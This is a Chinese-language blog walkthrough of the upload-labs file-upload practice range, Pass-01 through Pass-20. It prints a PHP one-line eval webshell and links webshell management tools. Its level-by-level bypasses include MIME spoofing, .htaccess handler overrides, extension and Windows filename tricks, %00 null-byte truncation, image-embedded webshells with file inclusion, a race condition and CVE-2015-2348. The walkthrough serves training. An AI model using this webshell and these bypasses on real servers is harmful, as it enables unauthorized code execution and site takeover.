upload-labs
靶场地址
1 | https://github.com/c0ny1/upload-labs |
一句话
1 | <?php @eval($_POST[123]);?> |
WebShell连接工具
中国蚁剑
1 | https://github.com/AntSwordProject/antSword |
AntSword 加载器
1 | https://github.com/AntSwordProject/AntSword-Loader |
菜刀
Pass-01
- 新建后缀.php的文件
- bp抓包
- 将Content-Type修改为允许上传的类型(image/jpeg、image/png、image/gif)三选一
Pass-03
- 黑名单验证
- 如果黑名单定义不完整的话是可以实现绕过的,用.phtml .phps .php5 .pht进行绕过。这里我们直接上传一个.php5文件
- 因为上传上去的文件名会改变,bp抓包数据包中有回显,所以我们还是可以访问的。
注意
- 要在apache的httpd.conf中有如下配置代码:AddType application/x-httpd-php .php .phtml .phps .php5 .pht,如果不配置他是无法解析php5代码的,访问的时候就是一个空白页
Pass-04
- 可以看到禁止上传文件太多了
- 首先创建一个.htaccess文件,里面写上代码
1
2
3<FilesMatch "1.png">
SetHandler application/x-httpd-php
</FilesMatch> - 这串代码的意思是如果文件中有一个1.png的文件,他就会被解析为.php.
- 再上传一个1.png的文件就能访问了
注意
.htaccess文件不能起名字,他就是.htaccess文件,如果你将他改为1.htaccess或者其他的什么名字是不可以的,无法解析。在实战中有可能上传上去这个文件会被自动重命名,被重命名了就不可以了。Pass-05
- 这一关没有强制将大写转换为小写,所以我们可以上传纯大写或者大小写结合的后缀名
- 直接上传一个后缀名为.PHP的文件,上传后或自动改名字bp抓包可以看见
- 我们可以看到上传成功,访问
Pass-06
注意
- Win下
xx.jpg空格
和xx.jpg.
两种文件是不被允许存在的,要是这样命名文件,windows系统会默认删除空格
或者.
- 我们用burp抓包将filename=”12345.php”改为filename=”12345.php “(12345.php空格)
Pass-07
- 和第七关思路一样,就是把空格换成点
Pass-08
- Windows本地文件系统中的文件流(File Streams):
当从 Windows shell 命令行指定创建文件时,流的完整名称为 “filename:stream name:stream type”,如示例中所示: “myfile.txt:stream1:$DATA” - 和上一关一样,直接上传,在数据包的php后面直接加上
::$DATA
Pass-09
- 这一关的思路是它没有循环验证,也就是说这些收尾去空,删除末尾的点,去除字符串::$DATA,转换为小写这些东西只是验证了一次。
- 所以我们的绕过思路就很简单,在数据包中把后缀名改为
.php. .
Pass-10
- 将文件名改为.pphphphpp
Pass-11
1
2
3POST /upload-labs/Pass-11/index.php?save_path=../upload/%00 HTTP/1.1
Content-Disposition: form-data; name="upload_file"; filename="pi .jpg" - 但是有环境限制: php版本要小于5.3.4,5.3.4及以上magic_quotes_gpc需要为OFF状态
Pass-12
跟上一关产不多 只不过是接受值变成了post,她两的差别呢就是get会自行解码,post不会自行解码,我们需要对%00进行编码,选中%00右键Pass-13
- 图片+php代码,组成一个图片码进行上传
- 首先制作一个图片码,可以直接用Notepad直接打开图片后面加一个php代码,但是需要16进制,要不然图片可能出错。
- 也可以cmd进行生成,命令语句:copy i.jpg /b + pi.php /a webshell.jpg
- upload-labs/include.php?file=upload/6520220814071149.png
Pass-14
- getimagesize函数,这个函数的意思是:会对目标文件的16进制去进行一个读取,去读取头几个字符串是不是符合图片的要求的
- 这关还是用和上关一样的方法,生成带有php代码的图片上传,配合包含漏洞拿下此关。
Pass-15
- 第15关同14,13关思路一样,操作一样。但是需要打开php_exif,
- exif_imagetype() 读取一个图像的第一个字节并检查其签名。
Pass-16
本关综合判断了后缀名、content-type,以及利用imagecreatefromgif判断是否为gif图片,最后对图片再做了一次二次渲染重新创建,所以在上传图片马的时候将上传后的图片马下载下来进行查看,看看它经过而渲染后的图片中的那些数据没有改变,可以通过16进制编辑器查看,然后我们在这些没有变的地方插入一句话,这样就可以成功上传了。之后的操作与之前的关卡一样Pass-17
本关考察的是条件竞争 通过白名单检测后缀名,符合就rename改名,不符合就unlink删除文件 可以用burp来发包不断访问,先写一个php写入文件的1.php然后在不断访问这文件就可以看到我们上传的东西了,而且在访问这文件就可以生成另外一个shell了(通过马生成的)Pass-18
和上一关几乎一模一样Pass-19
本关考察CVE-2015-2348 move_uploaded_file() 00截断,上传webshell,同时自定义保存名称,直接保存为php是不行的,查看源码发现move_uploaded_file()函数中的img_path是由post参数save_name控制的,因此可以在save_name利用00截断绕过Pass-20
通过查看源码可以发现:1
2
3
4
5
6
7
8
9
10
11
12
13
14
15$file_name经过reset($file) . '.' . $file[count($file) - 1];处理。
如果上传的是数组的话,会跳过$file = explode('.', strtolower($file));。
并且后缀有白名单过滤:
$ext = end($file); $allow_suffix = array('jpg','png','gif');
而最终的文件名后缀取的是$file[count($file) - 1],因此我们可以让$file为数组。
$file[0]为smi1e.php/,也就是reset($file),然后再令$file[2]为白名单中的jpg。
此时end($file)等于jpg,$file[count($file) - 1]为空。
而 $file_name = reset($file) . '.' . $file[count($file) - 1];,也就是smi1e.php/.,最终move_uploaded_file会忽略掉/.,最终上传smi1e.php。
本博客所有文章除特别声明外,均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来自 Putdownd’s Blog!